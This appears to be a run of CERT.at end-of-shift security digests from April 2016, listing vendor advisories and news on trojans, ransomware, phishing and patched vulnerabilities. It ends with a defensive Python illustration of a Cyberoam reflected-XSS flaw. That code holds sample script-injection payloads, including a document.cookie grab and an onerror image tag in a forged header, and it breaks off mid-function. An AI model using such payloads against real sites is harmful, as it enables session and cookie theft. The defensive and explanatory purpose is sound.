---------------------------------------------
https://www.debian.org/security/2016/dsa-3544
*** Cisco IP Interoperability and Collaboration System Cross-Site Scripting Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Symantec ITMS Inventory Solution Application Denial Functionality Bypass ***
---------------------------------------------
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
*** Security Updates Available for Adobe Flash Player (APSB16-10) ***
---------------------------------------------
A Security Bulletin (APSB16-10) has been published regarding security updates for Adobe Flash Player. These updates address critical vulnerabilities, and Adobe recommends users update their product installations to the latest versions using the instructions referenced in the security bulletin. Adobe...
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1334
*** SSA-751155 (Last Update 2016-04-08): Denial-of-Service Vulnerability in SCALANCE S613 ***
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-751155…
*** SSA-623229 (Last Update 2016-04-08): DROWN Vulnerability in Industrial Products ***
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-623229…
*** SSA-301706 (Last Update 2016-04-08): GNU C Library Vulnerability in Industrial Products ***
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-301706…
*** IBM Security Bulletins ***
---------------------------------------------
*** Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Flex System Chassis Management Module (CMM) ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099307
---------------------------------------------
*** Security Bulletin: Vulnerabilities in OpenSSH affect IBM Flex System Chassis Management Module (CVE-2016-0777, CVE-2016-0778) ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099309
---------------------------------------------
*** Security Bulletin: Vulnerabilities in NTP affect IBM Flex System FC3171 8Gb SAN Switch and SAN Pass-thru firmware, QLogic 8Gb Intelligent Pass-thru Module and SAN Switch Module and QLogic Virtual Fabric Extension Module ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099260
---------------------------------------------
*** Security Bulletin: Multiple vulnerabilities affect IBM Flex System Chassis Management Module ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099196
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM InfoSphere Master Data Management ***
http://www.ibm.com/support/docview.wss?uid=swg21980207
---------------------------------------------
*** IBM Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server Liberty shipped with IBM Standards Processing Engine and IBM Transformation Extender Advanced (CVE-2015-1283) ***
http://www.ibm.com/support/docview.wss?uid=swg21977266&myns=swgother&mynp=O…
---------------------------------------------
*** IBM Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server Liberty shipped with IBM Standards Processing Engine and IBM Transformation Extender Advanced (CVE-2015-3183) ***
http://www.ibm.com/support/docview.wss?uid=swg21977267&myns=swgother&mynp=O…
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 06-04-2016 18:00 − Thursday 07-04-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Trojan infects 3.2 million Android devices ***
---------------------------------------------
More than 100 apps in the official Google Play Store were shipped with a Trojan. According to security researchers, millions of Android users are affected.
---------------------------------------------
http://futurezone.at/digital-life/trojaner-im-google-play-store-infiziert-3…
*** Phishing Email That Knows Your Address ***
---------------------------------------------
An anonymous reader writes: BBC is reporting about a new type of phishing email that includes the recipient's home address. The publication, citing sources, claims that thousands of people have already received such malicious emails. Clicking on the email apparently installs malware such as Cryptlocker ransomware on the recipient's computing device. From the report, "Members of the BBC Radio 4's You and Yours team were among those who received the scam emails, claiming they owed hundreds of
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/7bIiICdWlco/phishing-email-…
*** Cisco warns of critical risks from web bugs and insecure SSH keys ***
---------------------------------------------
Fresh round of network security patches served. Cisco has released a fresh crop of security advisories, including warnings for critical flaws in the UCS, Prime Infrastructure and Evolved Programmable Network Manager (EPNM) that would allow an attacker to gain root access over its products.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/04/06/cisco_warns…
*** IETF meeting: new proposals for securing mail transport ***
---------------------------------------------
Mail servers still lag behind web servers in terms of security, as a recent TLS check by the IHK Stuttgart made clear. Mail providers have now joined forces to make progress at the IETF with "Strict Transport Security".
---------------------------------------------
http://heise.de/-3163818
*** Boffins boost IETF crypto efforts ***
---------------------------------------------
Nice elliptic curves, now show us your hardware so we can do this to TLS. A pair of German engineers want to give a push to the adoption of new crypto in the IETF by pushing the curves in RFC 7748 into hardware.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/04/07/boffins_boo…
*** Remote code execution found and fixed in Apache OpenMeetings ***
---------------------------------------------
Password token snatch might explain that unexpected weirdo in your next online meeting. Recurity Labs hacker Andreas Lindh has found four vulnerabilities, including a remote code execution hole, in Apache OpenMeetings. The flaws mean attackers could hijack installations of the popular virtual meetings and shared whiteboard application.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/04/07/apache_open…
*** Panama Papers: the catastrophic IT security practices of Mossack Fonseca ***
---------------------------------------------
The Panama leaks firm Mossack Fonseca apparently cares little not only about tax law, but also about IT security. No TLS, DROWN, and ancient versions of Drupal and Outlook Web Access make things easy for attackers.
---------------------------------------------
http://www.golem.de/news/panama-papers-die-katastrophale-it-sicherheitsprax…
*** Bypassing Phone Security through Social Engineering ***
---------------------------------------------
This works: Khan was arrested in mid-July 2015. Undercover police officers posing as company managers arrived at his workplace and asked to check his driver and work records, according to the source. When they disputed where he was on a particular day, he got out his iPhone and showed them the record of his work. The undercover officers asked to...
---------------------------------------------
https://www.schneier.com/blog/archives/2016/04/bypassing_phone.html
*** Complete Tour of PE and ELF: Section Headers ***
---------------------------------------------
In the previous part, we discussed the ELF and Program Header. In this article, we will cover the remaining part, i.e. section headers. We will also see what effect packers have on binaries' headers. Below is the structure of Section Header. Sh_name: Remember in ELF Header we talked about string table. sh_name is an...
---------------------------------------------
http://resources.infosecinstitute.com/complete-tour-of-pe-and-elf-part-5/
*** Carinthian company fell victim to an encryption Trojan ***
---------------------------------------------
A production machine was down for a day as a result
---------------------------------------------
http://derstandard.at/2000034398697
*** EUROCRYPT 2016 - supported by SBA Research ***
---------------------------------------------
May 08, 2016 - May 12, 2016 - All Day - Aula der Wissenschaften, Wollzeile 27A, Vienna
---------------------------------------------
https://www.sba-research.org/events/eurocrypt-2016-supported-by-sba-researc…
*** ECRYPT-CSA Workshop on Cryptographic protocols for small devices - supported by SBA Research ***
---------------------------------------------
May 13, 2016 - All Day - TU Wien, Karlsplatz 13, 1040 Wien
---------------------------------------------
https://www.sba-research.org/events/ecrypt-csa-workshop-on-cryptographic-pr…
*** UPDATED: Security Advisory posted for Adobe Flash Player (APSA16-01) ***
---------------------------------------------
A Security Advisory (APSA16-01) has been published regarding a critical vulnerability (CVE-2016-1019) in Adobe Flash Player. UPDATE: Adobe is aware of reports that CVE-2016-1019 is being actively exploited on systems running *Windows 10 and earlier* with Flash Player...
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1330
*** Juniper Networks Completes ScreenOS Update ***
---------------------------------------------
As we committed to in our January 8, 2016 blog, we have replaced the cryptographic algorithm in the latest release of ScreenOS 6.3.
---------------------------------------------
https://forums.juniper.net/t5/Security-Incident-Response/Juniper-Networks-C…
*** Bugtraq: CVE-2016-3672 - Unlimiting the stack no longer disables ASLR ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537996
*** DFN-CERT-2016-0567: McAfee Email Gateway: a vulnerability allows a cross-site scripting attack ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0567/
*** Panda Security URL Filtering Privilege Escalation ***
---------------------------------------------
Topic: Panda Security URL Filtering Privilege Escalation Risk: Medium Text:* CVE: CVE-2015-7378 * Vendor: Panda Security * Reported by: Kyriakos Economou * Date of Release: 05/04/2016 * Affected Pro...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016040048
*** Panda Endpoint Administration Agent Privilege Escalation ***
---------------------------------------------
Topic: Panda Endpoint Administration Agent Privilege Escalation Risk: Medium Text:* CVE: CVE-2016-3943 * Vendor: Panda Security * Reported by: Kyriakos Economou * Date of Release: 05/04/2016 * Affected Pro...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016040047
*** Security Advisory: Java vulnerabilities CVE-2016-0466 and CVE-2016-0483 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/50/sol50118123.html?…
*** HP Security Bulletins ***
---------------------------------------------
*** Bugtraq: [security bulletin] HPSBGN03569 rev.2 - HPE OneView for VMware vCenter (OV4VC), Remote Disclosure of Information ***
http://www.securityfocus.com/archive/1/538003
---------------------------------------------
*** Bugtraq: [security bulletin] HPSBST03568 rev.1 - HP XP7 Command View Advanced Edition Suite including Device Manager and Hitachi Automation Director (HAD), Remote Server-Side Request Forgery (SSRF) ***
http://www.securityfocus.com/archive/1/538005
---------------------------------------------
*** HPE Universal Configuration Management Database Unspecified Flaw Lets Remote Users Obtain Information and Perform Redirect Attacks ***
http://www.securitytracker.com/id/1035505
---------------------------------------------
*** HPSBNS03571 rev.1 - HPE NonStop Virtual TapeServer (VTS), Remote Arbitrary Code Execution, Denial of Service (DoS), Unauthorized Information Disclosure ***
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05073516
---------------------------------------------
*** HPSBGN03570 rev.1 - HPE Universal CMDB, Remote Information Disclosure, URL Redirection ***
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05073504
---------------------------------------------
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco Prime Infrastructure and Evolved Programmable Network Manager Privilege Escalation API Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco TelePresence Server Crafted IPv6 Packet Handling Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco TelePresence Server Malformed STUN Packet Processing Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco TelePresence Server Crafted URL Handling Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco UCS Invicta Default SSH Key Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM Pure Power Integration Manager (PPIM) (CVE-2016-0777, CVE-2016-0778) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023271
---------------------------------------------
*** IBM Security Bulletin: SLOTH - Weak MD5 Signature Hash vulnerability may affect DS8000 ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005735
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM OS Images for Red Hat Linux Systems, AIX, and Windows. (CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21980641
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM Image Construction and Composition Tool. (CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21980640
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM Workload Deployer. (CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21980638
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM MQ Internet Pass-Thru (CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21979712
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in IBM Java SDK affects IBM PureApplication System. (CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21980639
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK 7 affect IBM Systems Director (CVE-2015-4872, CVE-2015-4840, CVE-2015-4903) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023588
---------------------------------------------
*** IBM Security Bulletin: IBM InfoSphere Master Data Management Collaborative Edition affected by Privilege Escalation security vulnerabilities (CVE-2015-7424) ***
http://www.ibm.com/support/docview.wss?uid=swg21971542
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities have been identified in IBM Business Process Manager, and bundled products shipped with IBM Cloud Orchestrator and Cloud Orchestrator Enterprise ***
http://www.ibm.com/support/docview.wss?uid=swg2C1000112
---------------------------------------------
*** IBM Security Bulletin: IBM TRIRIGA Application Platform Cross Site Scripting Vulnerability (CVE-2016-0344) ***
http://www.ibm.com/support/docview.wss?uid=swg21980234
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 05-04-2016 18:00 − Mittwoch 06-04-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Security Advisory posted for Adobe Flash Player (APSA16-01) ***
---------------------------------------------
A Security Advisory (APSA16-01) has been published regarding a critical vulnerability (CVE-2016-1019) in Adobe Flash Player. Adobe is aware of reports that CVE-2016-1019 is being actively exploited on systems running Windows 7 and Windows XP with Flash Player version 20.0.0.306 and earlier.
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1330
*** Security: Unpatched Flash hole is being actively exploited ***
---------------------------------------------
It is Flash-Player-uninstall day again. A currently unpatched vulnerability is being actively exploited; at least a workaround exists. Adobe says it will respond soon.
---------------------------------------------
http://www.golem.de/news/security-ungepatchte-flash-luecke-wird-aktiv-ausge…
*** Server software poses soft target for ransomware ***
---------------------------------------------
An alternate method for infecting computers with ransomware signals a shift in tactics by cybercriminals that could put businesses at greater risk, according to Symantec. A type of ransomware called Samsam has been infecting organizations but is not installed in the usual way. "Samsam is another variant in a growing number of variants of ransomware, but what sets it apart from other ransomware is how it reaches its intended targets by way of unpatched server-side software," Symantec...
---------------------------------------------
http://www.cio.com/article/3052553/server-software-poses-soft-target-for-ra…
*** SAP Security - Think Different ***
---------------------------------------------
Today we will discuss how SAP Security differs from traditional IT security. While in most cases security is security, no matter what we discuss, in SAP area there are some unique features. First of all, it is the question of responsibility. It's not a secret that SAP is owned and managed by business, which, to...
---------------------------------------------
http://resources.infosecinstitute.com/sap-security-think-different/
*** Gpg4win 2.3.1 released ***
---------------------------------------------
New in Gpg4win Version 2.3.1 (2016-04-05)
- GpgOL now has an option dialog where S/MIME can be disabled.
- GpgOL now supports the 64 Bit version of Microsoft Outlook.
- ...
---------------------------------------------
https://lists.wald.intevation.org/pipermail/gpg4win-announce/2016-April/000…
*** Researchers release PoC exploit for broken IBM Java patch ***
---------------------------------------------
Polish firm Security Explorations has had enough of broken patches for security vulnerabilities it has reported to vendors. On Monday, the company's CEO Adam Gowdiak published on the Full Disclosure mailing list the technical details and PoC code for exploiting a security issue in IBM Java that the vendor had patched poorly. The flaw was discovered by Security Explorations researchers in early 2013. This is the 6th instance of a broken patch...
---------------------------------------------
https://www.helpnetsecurity.com/2016/04/06/broken-ibm-java-patch/
*** AdLoad: an advertisement bombarder ***
---------------------------------------------
The AdLoad PUP is an infection that presents its victims with a great variety of advertisements, fake alerts, dubious offers, and even other PUPs. It targets users by location and OS.
---------------------------------------------
https://blog.malwarebytes.org/threat-analysis/2016/04/adload-an-advertiseme…
*** FBI Warns of Dramatic Increase in Business E-Mail Scams ***
---------------------------------------------
FBI officials are warning potential victims of a dramatic rise in the business e-mail compromise scam or "B.E.C.", [...] Law enforcement globally has received complaints from victims in every U.S. state and in at least 79 countries. [...] This amounted to more than $2.3 billion in losses.
---------------------------------------------
https://www.fbi.gov/phoenix/press-releases/2016/fbi-warns-of-dramatic-incre…
*** Crypto ransomware targets called by name in spear-phishing blast ***
---------------------------------------------
Once the domain of espionage, personalized scams embraced by profit-driven scammers.
---------------------------------------------
http://arstechnica.com/security/2016/04/crypto-ransomware-targets-called-by…
*** CONIKS ***
---------------------------------------------
CONIKS is a new, easy-to-use transparent key-management system: CONIKS is a key management system for end users capable of integration in end-to-end secure communication services. The main idea is that users should not have to worry about managing encryption keys when they want to communicate securely, but they also should not have to trust their secure communication service providers to...
---------------------------------------------
https://www.schneier.com/blog/archives/2016/04/coniks.html
*** DeepSec 2015 Videos (Youtube Playlist) ***
---------------------------------------------
DeepSec 2015 In-Depth Security Conference, 17th to 20th November 2015, The Imperial Riding School, Vienna, Austria
---------------------------------------------
https://www.youtube.com/playlist?list=PLBA0WdWrcrCHpBtNgK-H64_S6-xBpzILR
*** ICS/SCADA Threat Intelligence Sharing Portal (March 31, 2016) ***
---------------------------------------------
The EastWest Institute and the US Department of Homeland Security's ICS-CERT have launched a portal for operators of critical infrastructure around the world to share threat information...
---------------------------------------------
http://www.sans.org/newsletters/newsbites/r/18/27/308
*** Of Moorhuhn, car accidents and outdated software ***
---------------------------------------------
Peter takes his car to his trusted garage for its periodic roadworthiness inspection, the Austrian "Pickerl". After about half an hour the mechanic tells him that the car's brake lines are badly corroded and that it is only a matter of time before they burst and the brakes fail. Peter gulps: "Well, I've...
---------------------------------------------
http://www.cert.at/services/blog/20160406112228-1706.html
*** VLC Media Player Buffer Overflow in Processing WAV Files Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1035456
*** Security Advisory: Java vulnerabilities CVE-2016-4066 and CVE-2016-0483 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/50/sol50118123.html?…
*** DSA-3542 mercurial - security update ***
---------------------------------------------
Several vulnerabilities have been discovered in Mercurial, a distributed version control system. The Common Vulnerabilities and Exposures project identifies the following issues:
---------------------------------------------
https://www.debian.org/security/2016/dsa-3542
*** DFN-CERT-2016-0556: Red Hat JBoss Enterprise Application Platform: two vulnerabilities allow a denial-of-service attack ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0556/
*** Pro-face GP-Pro EX HMI Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for hard-coded credentials in Pro-face's GP-Pro EX HMI software.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-096-01
*** Eaton Lighting Systems EG2 Web Control Authentication Bypass Vulnerabilities ***
---------------------------------------------
This advisory was originally posted to the US-CERT secure Portal library on March 1, 2016, and is being released to the NCCIC/ICS-CERT web site. This advisory contains mitigation details for vulnerabilities in Eaton Lighting Systems' EG2 Web Control application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-061-03
*** Rockwell Automation Integrated Architecture Builder Access Violation Memory Error ***
---------------------------------------------
This advisory was originally posted to the US-CERT secure Portal library on February 25, 2016, and is being released to the NCCIC/ICS-CERT web site. This advisory contains mitigation details for an access violation memory error in Rockwell Automation's Integrated Architecture Builder application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-056-01
*** Bugtraq: op5 v7.1.9 Remote Command Execution ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537992
*** Bugtraq: CA20160405-01: Security Notice for CA API Gateway ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537991
*** [HTB23286]: SQL Injection in SocialEngine ***
---------------------------------------------
Product: SocialEngine v4.8.9
Vulnerability Type: SQL Injection [CWE-89]
Risk level: High
Creator: Webligo
Advisory Publication: December 21, 2015 [without technical details]
Public Disclosure: April 6, 2016
CVE Reference: Pending
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Vulnerability Details: High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in the popular social networking software SocialEngine. The vulnerability can be exploited to gain
---------------------------------------------
https://www.htbridge.com/advisory/HTB23286
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in Samba affect IBM i ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021200
---------------------------------------------
*** IBM Security Bulletin: IBM TRIRIGA Application Platform Privilege Escalation (CVE-2016-0342) ***
http://www.ibm.com/support/docview.wss?uid=swg21980252
---------------------------------------------
*** IBM Security Bulletin: IBM TRIRIGA Application Platform Cross Site Request Forgery Vulnerability (CVE-2016-0346) ***
http://www.ibm.com/support/docview.wss?uid=swg21980237
---------------------------------------------
*** IBM Security Bulletin: IBM TRIRIGA Application Platform Information disclosure (CVE-2016-0345) ***
http://www.ibm.com/support/docview.wss?uid=swg21980233
---------------------------------------------
*** IBM Security Bulletin: IBM TRIRIGA Application Platform Information Disclosure (CVE-2016-0343) ***
http://www.ibm.com/support/docview.wss?uid=swg21980229
---------------------------------------------
*** IBM Unauthenticated access to information in IBM TRIRIGA Application Platform (CVE-2016-0312) ***
http://www.ibm.com/support/docview.wss?uid=swg21979762
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM BigFix Remote Control and IBM Endpoint Manager for Remote Control (CVE-2015-3194) ***
http://www.ibm.com/support/docview.wss?uid=swg21978415
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Tivoli Composite Application Manager for Transactions (CVE-2016-0705, CVE-2016-0798, CVE-2016-0797, CVE-2016-0799, CVE-2016-0702) ***
http://www.ibm.com/support/docview.wss?uid=swg21978869
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Tivoli Network Manager IP Edition 3.9 Fix Pack 4. ***
http://www.ibm.com/support/docview.wss?uid=swg21978941
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM MQ Appliance ***
http://www.ibm.com/support/docview.wss?uid=swg21979829
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM MessageSight (CVE-2016-0800, CVE-2016-0705 and CVE-2016-0797) ***
http://www.ibm.com/support/docview.wss?uid=swg21980451
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Netezza Host Management ***
http://www.ibm.com/support/docview.wss?uid=swg21979983
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect Tivoli Workload Scheduler (CVE-2016-0705, CVE-2016-0702, CVE-2016-0800, CVE-2016-0701) ***
http://www.ibm.com/support/docview.wss?uid=swg21979602
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect Tivoli Provisioning Manager for OS Deployment, Tivoli Provisioning Manager for Images ***
http://www.ibm.com/support/docview.wss?uid=swg21979311
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Sterling Connect:Express for UNIX (CVE-2016-0800, CVE-2016-0705, CVE-2016-0798, CVE-2016-0797, CVE-2016-0799, CVE-2016-0702, CVE-2016-0703, CVE-2016-0704) ***
http://www.ibm.com/support/docview.wss?uid=swg21978489
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 04-04-2016 18:00 − Dienstag 05-04-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Chrome Extension Caught Hijacking Users Browsers ***
---------------------------------------------
An anonymous reader writes: Google has intervened and banned the Better History Chrome extension from the Chrome Web Store after users reported that it started taking over their browsing experience and redirecting them to pages showing ads. As it turns out, the extension was sold off to an unnamed buyer who started adding malicious code that would redirect the users' traffic through a proxy, showing ads and collecting analytics on the users' browsing habits. This same malicious code has also been...
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/4tdNNvCWAQs/chrome-extensio…
*** Microsoft account-hijacking hole closed 48 hours after bug report ***
---------------------------------------------
Token-harvesting attack meant one login could open doors to multiple Microsoft services. British researcher Jack Whitton has reported a Microsoft account hijacking authentication bug that would have been another arrow in an attacker's phishing quiver, save for the fact that Microsoft fixed it.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/04/05/microsoft_b…
*** Security holes: attackers can slip code into Open-Xchange ***
---------------------------------------------
Open-Xchange has two vulnerabilities through which criminals can, in the worst case, hijack sessions. Security patches have already been distributed.
---------------------------------------------
http://heise.de/-3162127
*** Update your ManageEngine Password Manager Pro ASAP! ***
---------------------------------------------
Security researcher Sebastian Perez has revealed eight serious security vulnerabilities in ManageEngine Password Manager Pro (PMP), a password management software for enterprises, and has released details and PoC code for each of them. The solution has already been updated with fixes, so if your enterprise is using it to control the access to shared administrative/privileged passwords, you should update to the latest version and build (v8.3, build 8303) as soon as possible (if you haven't...
---------------------------------------------
https://www.helpnetsecurity.com/2016/04/05/update-manageengine-password-man…
*** One Conference 2016 Protecting Bits and Atoms: Cyber security is a precondition for our future ***
---------------------------------------------
Cyber security, and therefore being able to use all the possibilities that ICT offers, is a precondition for the undisturbed functioning of society and for our future. With these words, State Secretary Dijkhoff (Security and Justice) emphasizes the importance of the international One Conference 2016 of the National Cyber Security Centre (NCSC). We can't be passive about what is to come. The speed of the developments in the digital domain requires a continuous effort of both public and private...
---------------------------------------------
https://www.ncsc.nl/english/current-topics/news/one-conference-2016-protect…
*** Firefox Add-On Flaw Leaves Apple And Windows Computers Open To Attack ***
---------------------------------------------
Researchers say reliance on an outdated Firefox extension platform opens the door for remote system attacks on Mac OS and Windows systems.
---------------------------------------------
http://threatpost.com/firefox-add-on-flaw-leaves-apple-and-windows-computer…
*** Keep Windows machines infected abusing Windows Desired State Configuration (DSC) ***
---------------------------------------------
At the last Black Hat Asia, forensics experts Matt Hastings and Ryan Kazanciyan from Tanium demonstrated how to abuse the Windows Desired State Configuration (DSC) feature to gain persistence on a compromised machine. The DSC...
---------------------------------------------
http://securityaffairs.co/wordpress/46006/hacking/abusing-windows-dsc.html
*** Complete Tour of PE and ELF: Part 4 ***
---------------------------------------------
Since we have completed the PE structure, now it is time to look at the ELF structure which is somewhat easier to understand as compared to PE. For ELF structure, we will be looking at both the linking view and execution view of a binary. Sections are similar to what we saw in PE structure...
---------------------------------------------
http://resources.infosecinstitute.com/complete-tour-of-pe-and-elf-part-4/
*** CNBC's password test: unencrypted and irresponsible ***
---------------------------------------------
In an article by the news channel CNBC, readers could test the security of their passwords. What could possibly go wrong? Quite a lot, as security researchers show.
---------------------------------------------
http://heise.de/-3162731
*** Google fixes 39 Android flaws, some allow hackers to take over your phone ***
---------------------------------------------
Google has released one of the largest Android monthly security updates, fixing a total of 39 vulnerabilities - 15 rated critical, including four that can lead to a complete device compromise. The patches, which are included in new firmware images that were released Monday for the company's Nexus devices, will also be published to the Android Open Source Project over the next 24 hours. They include a fix for a vulnerability that Google warned about two weeks ago and which is already being...
---------------------------------------------
http://www.cio.com/article/3052201/google-fixes-39-android-flaws-some-allow…
*** About the security content of iOS 9.3 ***
---------------------------------------------
This document describes the security content of iOS 9.3.
---------------------------------------------
https://support.apple.com/en-us/HT206166
*** DFN-CERT-2016-0548: BlackBerry powered by Android: multiple vulnerabilities allow, among other things, execution of arbitrary code ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0548/
*** DFN-CERT-2016-0549: Google Android Operating System: multiple vulnerabilities allow, among other things, gaining administrator privileges ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0549/
*** Sophos Cyberoam NG Series Multiple Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
Multiple reflected XSS issues were discovered in Cyberoam NG appliances. Input passed via the ipFamily, applicationname and username GET parameters to LiveConnections.jsp and LiveConnectionDetail.jsp is not properly sanitised before being returned to the user. Adding an arbitrary X-Forwarded-For HTTP header to a request also makes the appliance prone to an XSS issue. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5313.php
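As an added illustration of the two input paths the advisory names (GET parameters and the X-Forwarded-For header), the following Python is example code written for this digest, not Cyberoam's JSP and not taken from the ZSL advisory; the row layout, the two render functions and the sample request values are assumptions. It shows the reflected pattern beside a hardened rendering that allow-lists the enumerated field, escapes free text for its HTML context, URL-encodes the value placed in a link, and treats the proxy header as attacker-controlled input like any other.

```python
import html
from typing import Mapping
from urllib.parse import quote

# Constructed request (not a capture), using the advisory's parameter names.
SAMPLE_PARAMS = {
    "ipFamily": "4",
    "applicationname": "<script>alert(document.cookie)</script>",
    "username": "alice",
}
# Any client, or a forged proxy hop, can set this header; it is user input.
SAMPLE_HEADERS = {"X-Forwarded-For": '"><img src=x onerror=alert(1)>'}


def render_vulnerable(params: Mapping[str, str], headers: Mapping[str, str]) -> str:
    """Reflects every value verbatim: a crafted link, or a request carrying a
    crafted X-Forwarded-For, runs script in the viewing admin's browser."""
    client = headers.get("X-Forwarded-For", "unknown")
    return (
        "<tr><td>IPv" + params.get("ipFamily", "") + "</td>"
        "<td>" + params.get("applicationname", "") + "</td>"
        "<td>" + params.get("username", "") + "</td>"
        '<td><a href="detail?src=' + client + '">' + client + "</a></td></tr>"
    )


def render_hardened(params: Mapping[str, str], headers: Mapping[str, str]) -> str:
    """Same row: the enumerated field is allow-listed, free text is escaped
    for HTML (quote=True also covers attribute values), the link parameter is
    URL-encoded before being placed in the attribute, and the header gets no
    more trust than a query parameter."""
    def esc(s: str) -> str:
        return html.escape(s, quote=True)

    ip_family = params.get("ipFamily", "")
    if ip_family not in ("4", "6"):
        ip_family = "?"
    client_raw = headers.get("X-Forwarded-For", "unknown")
    href_value = esc(quote(client_raw, safe=""))   # URL context inside an attribute
    client_text = esc(client_raw)                   # element text context
    return (
        "<tr><td>IPv" + ip_family + "</td>"
        "<td>" + esc(params.get("applicationname", "")) + "</td>"
        "<td>" + esc(params.get("username", "")) + "</td>"
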